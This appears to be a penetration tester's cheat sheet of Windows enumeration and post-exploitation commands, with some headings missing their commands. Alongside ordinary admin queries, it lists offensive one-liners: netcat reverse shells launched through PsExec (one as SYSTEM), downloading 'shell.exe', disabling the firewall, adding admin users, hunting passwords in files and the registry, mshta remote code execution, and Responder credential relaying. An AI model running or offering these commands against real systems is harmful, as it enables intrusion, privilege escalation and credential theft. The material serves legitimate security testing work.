Hooper Labs

Windows Enumeration



List System Info


List System Info (shortened)

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"



OS Version



Prints username

echo %username%

Display All User Info

whoami /all

Env Variables Beginning with "U"


Add User

net user <user> <password> /add

Add User to Group

net localgroup administrators /add <user>

Add User to Domain Group

net group "HR Admins" myUser /add /domain


Network Interfaces

ipconfig /all

Routing Table

route print

ARP Table

arp -A

All Open Connections

netstat -ano

All TCP Connections

netstat -ano -p TCP

Firewall State

netsh firewall show state

Firewall Config

netsh firewall show config

Firewall State

netsh advfirewall show currentprofile

Firewall Config

netsh advfirewall firewall show rule name=all

Turn off Firewall

netsh advfirewall set allprofiles state off

List Computers In Current Domain

net view

List Users

net users

List User Info

net user user1


net config

Processes, Services, Drivers

Scheduled Tasks

schtasks /query /fo LIST /v

Delete Scheduled Task


Create Scheduled Task

SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo,Y|cacls C:\Windows\Fonts\*.exe /G everyone:f"

Processes + Services

tasklist /SVC

Terminate Process

taskkill /PID pid

Kill Process forcefully by imagename

taskkill /F /IM wscript.exe

Running Services

net start

Query Service Config

sc qc [service_name]

Service Info

sc queryex state=

List Drivers


List Drivers

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Get Loaded Driver Version Numbers

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName,DriverVersion,Manufacturer | ?{$_.DeviceName -like "*XBox*"}

Searching Files

PDF Search

dir /a /s /b c:\*.pdf*

Search for Patches

dir /a /b c:\windows\kb*

Search for Passwords (recursively from current directory)

findstr /si password *.txt *.xml *.xls *.ini *.inf

Search for filenames with password

dir /s *pass* == *cred* == *vnc* == *.config*

Search registry for password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /v password /t REG_SZ /s

View Remote Files

dir \\IP.ADD.RE.SS\C$

List Mounted Drives


Search for AlwaysInstallElevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

Search for AlwaysInstallElevated

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer


Enum Domain Info


Run As Different User

runas /u:Administrator cmd.exe

Copy output to Clipboard

| clip

Check File Permissions

cacls <Program File>

Check File Permissions


List Dirs and Owners

dir /q

Open Webpage


Installed Updates (Hotfixes)

wmic qfe get Caption,Description,HotFixID,InstalledOn

Kill Processes with Known ExecutablePath

wmic process where ExecutablePath='C:\Windows\Fonts\svhost.exe' delete


Download Page

powershell -command "& {&'wget' -OutFile shell.exe}"

Runas Equivalent

PsExec.exe /accepteula -u <user> -p <pass> nc.exe -nv 8888 -e cmd.exe

Get System Privileges

PsExec.exe /accepteula -i -d -s nc.exe -nv 8889 -e cmd.exe

Wget Equivalent

Invoke-WebRequest -uri <URL> -OutFile C:\Windows\TEMP\outfile.txt

Sysinternals Suite Notes

Accept EULA

accesschk.exe /accepteula

Find Files With Insecure Permissions

accesschk.exe -uws "Everyone" "C:\Program Files"

Check Auto Runs

Autorunsc.exe /accepteula

Check File Privs

C:\Users\Public\accesschk64.exe /accepteula *

Check Process Privs

accesschk.exe -vqp *

Find Permissions

accesschk.exe -uwdqs users c:\

Find Permissions

accesschk.exe -uwdqs "Authenticated Users" c:\

Find Permissions

accesschk.exe -uwqs users c:\*.*

Find Permissions

accesschk.exe -uwqs "Authenticated Users" c:\*.*

Find Permissions

cacls "c:\Program Files" /T | findstr Users

Stop network traffic to domain

echo 127.0.0.1 my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts

Take Ownership of a File

takeown /F file.txt

MSHTA.exe Code Execution

Start the Metasploit server (exploit/windows/misc/hta_server). Then run "mshta.exe //<ip-addr>/random.hta" on the host machine.

Temporary Folder (System)


Temporary Folder (User)



List Groups

wmic group list brief

List Hotfixes

wmic qfe list brief

Desktop Information

wmic desktop list brief

CD Information

wmic cdrom list brief

NIC Information

wmic nic list brief

List Installed Programs (lists only installed by Windows Installer)

wmic product get name,version,vendor

Control Output of wmic Command

wmic process get name,processid

Start a Program

wmic /node:localhost process call create 'C:\file.exe'

Close a Program

wmic process where processid="1000" call terminate

Close a Remote Program

wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate

Turn on RemoteDesktop

wmic /node:"servername" /user:"user@domain" /password:"password" RDToggle where ServerName="server name" call SetAllowTSConnections 1

LogicalDisk Free Space

wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv | MORE /E +2 >> SRVSPACE.CSV

List all Shares

wmic logicaldisk get name,providername

List all Shares


Mount a CIFS Share


List Startup Processes

wmic startup get caption,command,user

Run wmic Remotely

wmic /node:remotehost /user:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started


Make HTTP Request (Download a file)

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Open remote Office document

"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"

List Shadow Copies

List all autorun programs in XML format

autorunsc.exe -x > autoruns.xml

List all non-Microsoft autoruns in CSV format

autorunsc.exe -m -v

List audit policy

auditpol /get /category:*

Turn on an audit policy

auditpol /set /subcategory:"Logon" /success:enable

Domain Joined

Get Domain Users

net user /domain

Get Domain Groups

net group /domain

Get Current Domain

Search AD

$ldapsearch = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchstr); $objDomain = New-Object System.DirectoryServices.DirectoryEntry; $ldapsearch.SearchRoot = $objDomain; $ldapsearch.filter="samAccountType=805306368"; $ldapsearch.FindAll();

Find Logged On Users

Get-NetLoggedon -ComputerName foobar

Find Logged On Sessions

Get-NetSessions -ComputerName dc02


Invoke MultiRelay (relays if an incoming connection is received)

python MultiRelay.py -t -u ALL

Determine if target is vulnerable

python RunFinger.py -i

Start Responder

python Responder.py -I eth0